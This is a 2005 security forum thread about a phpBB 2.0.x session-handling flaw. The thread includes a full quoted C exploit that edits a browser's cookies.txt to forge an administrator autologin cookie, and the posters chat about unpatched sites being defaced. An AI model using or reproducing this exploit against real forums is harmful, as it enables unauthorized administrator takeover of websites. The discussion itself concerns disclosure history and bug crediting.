Waraxe IT Security Portal
Login or Register
November 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 84
Members: 0
Total: 84
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Suggestions -> another suggestion from me
Post new topicReply to topic View previous topic :: View next topic
another suggestion from me
PostPosted: Sat Apr 09, 2005 4:06 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




waraxe , i see that if u publish/submit some news will get 10 point , but i dont find any news on this site ? how is that ?

i think many people here found many 'good' news to share
btw , why dont u give some space for article section Rolling Eyes maybe for paper about your eexploiting technichal detail for one advisories Smile

ive made one paper about highlight holes in phpbb and already publish in my community site, but as u see im to 'lazy' to write another Sad , so maybe u could write about sql ( i know you good on that Razz) or another interesting point Rolling Eyes

maybe some friends would share ? LINUX ? slimjim ? Heintz ? pokylez or .. somebody ?

heintz : im still waiting about detailed exploiting phpbb Rolling Eyes

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Apr 09, 2005 4:18 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yep, news/articles/topics section is not fully functional yet...
You can still submit the stuff and i will look, if i can put it up right now.
This news thing, it needs some work from me (some code improvements/debug/tests), i will make it functional as soon as possible, but yeah, all submissions are welcome allready now Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Apr 09, 2005 4:35 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




on the contrary , im waiting a paper from you Smile
hehhe.. maybe i post something if i not too busy .. but im not promising here

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Apr 09, 2005 5:54 pm Reply with quote
Heintz
Valuable expert
Valuable expert
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




detailed explotation. well if you want to do it manually then refer to original
thread http://www.waraxe.us/ftopict-525.html.
but i think exploit in C even exists Laughing

if you want more info then look in php manual:
http://se2.php.net/serialize
http://se2.php.net/unserialize
http://se2.php.net/types.boolean

anyway i think this thing is kinda old allready and
all serious sites have patched their software
Smile

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sat Apr 09, 2005 6:33 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Heintz, look here:

http://forum.zone-h.org/viewtopic.php?t=2189

Quote:

SyS64738
Zone-H Staff

Posted: Fri Mar 04, 2005 9:54 am Post subject:

--------------------------------------------------------------------------------

http://www.k-otik.com/exploits/20050228.phpbbsession.c.php

that was the one they used.

Relax, all they could do was to change the database. No rights over the machine.

When we choosed phpbb we accounted the forum could be hacked twice per year. It was just about time.
All you have to do now is to start the cronometer and see how long it will take till the next time, you have to live with it unless you want to write your own forum application

For Zone-H is no harsh, after all is only backing up our theory where the future hacking playgorund will be mostly at the application level. Now everybody is saying that but I recall that Zone-H has been the first public source that started to say it around.

Strange we didn't receive any notification about the episode in our mirror database.

A hug

SyS64738
_________________
www.zone-h.org admin



Heh, zone-h is defacer's heaven and they forum got defaced by Heintz exploit Very Happy

But let's look further:

http://www.k-otik.com/exploits/20050228.phpbbsession.c.php

Code:

phpBB 2.0.x Session Handling Administrator Authentication Bypass Exploit
Date : 28/02/2005

Related Advisories : FrSIRT/ADV-2005-0212
Rated as : High

/*
Author: Paisterist
Date: 28-02-05
[N]eo [S]ecurity [T]eam ?

Description: this exploit modify the user id that is in your
cookies.txt (Firefox and Mozilla) file.
You have to log in the forum, with the autologin option unchecked,
then you close the navigator and
execute the exploit.
If you have any problem with the exploit, remove all cookies and do all
again.

Note: you have to put the exploit in the same directory of cookies.txt.
This exploit overwrite all phpbb cookies that have the user id
specified.

I HAVE NOT DISCOVERED THIS VULNERABILITY, I DON'T KNOW WHO HAS
DISCOVERED IT.

By Paisterist

http://neosecurityteam.net
http://neosecurityteam.tk

Greetz: Hackzatan, Crashcool, Towner, Daemon21, Wokkko, Maxx,
Arcanhell, Alluz.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char** argv[]) {
FILE *pointer;
char contenido[10000],

cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0
%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",
cookief[9]="%22%3B%7D", cookiec[106],

cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb
%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
*pos;
int p=0, i=0;

if (argc!=2) {
printf("Usage: phpbb_exploit.exe user_id\n\n");
exit(0);
}
pointer=fopen("cookies.txt", "r");

if (pointer) {
fread(contenido, 300, 10, pointer);
fclose(pointer);
} else {
printf("The file can't be open\n");
exit(0);
}

strcpy(cookiec, cookie);
strncat(cookiec, argv[1], 6);
strcat(cookiec, cookief);

if (pos=strstr(contenido, cookiec)) {
p=pos - contenido;
while (i<92) {
if (cookie_false[i]!=NULL)
contenido[p]=cookie_false[i];
p++;
i++;
}
}
else {
printf("The file cookies.txt isn't valid for execute the
exploit or the user id is incorrect\n");
exit(0);
}

if (pointer=fopen("cookies.txt", "w")) {
fputs(contenido, pointer);
printf("Cookie modified: \n\n%s\n\n", contenido);
printf("The cookies file has overwriten... looks like the exploit has worked");
} else printf("\n\nThe file cookies.txt has not write permissions.");
return 0;
}


As we can see:

Quote:

I HAVE NOT DISCOVERED THIS VULNERABILITY, I DON'T KNOW WHO HAS
DISCOVERED IT.


So they don't know, who has discovered this bug Question
wtf?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Apr 09, 2005 7:04 pm Reply with quote
Heintz
Valuable expert
Valuable expert
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




yea. very little ammount of people know hwo actually found the bug.
i thought i release the info about bug day earlier to theese forums. to make this sites visitors feel more "privileged" then other security site visitors. and then let developers know to prevent chaos. but someone who read this info allready had let them know about it, and i was a bit late. so they put info to their site and told me i was not going to be credited for it. most exploit writers have probably got the info from phpbb.com.

but i can live with it Cool

but thing is that they are not very friendly also about bug reporting (register to forum, so you could use their bug tracker). but who writes the rules about this thing anyway? they should be makeing it easier to report bugs to them, and be thankful for it, they benefit from it, not bug reporter. if bug reporter have to choose between: 1)registering (which can be tricky when activation code gets caught by spam-filter) and formating the bug very specifically.
or 2) selling it to some pr0n firm for example Laughing (this includes all self-befitting stuff)
then i doupt that all choose the 1.

i hope i made some point.. but i don't expect anyone to understand this Smile

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sun Apr 10, 2005 2:59 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




Heintz wrote:
detailed explotation. well if you want to do it manually then refer to original
thread http://www.waraxe.us/ftopict-525.html.
but i think exploit in C even exists Laughing

if you want more info then look in php manual:
http://se2.php.net/serialize
http://se2.php.net/unserialize
http://se2.php.net/types.boolean

anyway i think this thing is kinda old allready and
all serious sites have patched their software
Smile


well thx ,
old thing with new effect Smile

fyi: there are many forum still leave unpatch (what a lazy admin Laughing)

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 10, 2005 3:03 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




y3dips wrote:

fyi: there are many forum still leave unpatch (what a lazy admin Laughing)


This exploit will be vital for long time - because for example even after 6 months from now there will be webmasters, who will install some old phpbb version and its only question of time, when that website will be defaced Rolling Eyes
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Apr 10, 2005 3:35 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




yap, you right waraxe, the old phpbb version still spread like a time bomb (Laughing) , i download one from SF.net (the 2.0.11) to do some research, first i thought that it already patched , but im wrong coz it leave unpacth Rolling Eyes

so ?

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
another suggestion from me
www.waraxe.us Forum Index -> Suggestions
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds